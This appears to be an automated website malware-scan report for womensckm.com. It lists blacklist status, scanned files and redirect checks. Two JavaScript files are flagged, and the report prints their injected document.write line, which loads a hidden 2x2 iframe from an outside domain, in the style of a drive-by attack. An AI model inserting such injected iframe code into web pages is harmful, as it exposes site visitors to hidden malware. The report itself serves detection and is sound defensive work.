Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=womensckm.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://womensckm.com/ | 200 OK Content-Length: 60835 Content-Type: text/html | clean |
http://womensckm.com/AC_RunActiveContent.js | 200 OK Content-Length: 8193 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?j=614581 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://womensckm.com/jqueryslidemenu.js | 200 OK Content-Length: 2555 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581></iframe>');
var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers= if ($targetul.queue().length<=1) $targetul.css({left:menuleft+"px", width:this._dimensions.subulw+'px'}).slideDown(jqueryslidemenu.animateduration.over) }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?j=614581 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581> | ||
http://www.womensckm.com/fpss/engines/jquery-comp.js | 200 OK Content-Length: 29846 Content-Type: application/x-javascript | clean |
http://www.womensckm.com/fpss/engines/jquery-fpss-comp.js | 200 OK Content-Length: 2854 Content-Type: application/x-javascript | clean |
http://millerusa.net/637953.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
http://millerusa.net/test404page.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: womensckm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 21:00:54 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
GET / HTTP/1.1
Host: womensckm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 21:00:54 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: womensckm.com
Referer: http://www.google.com/search?q=womensckm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: womensckm.com
Referer: http://www.google.com/search?q=womensckm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.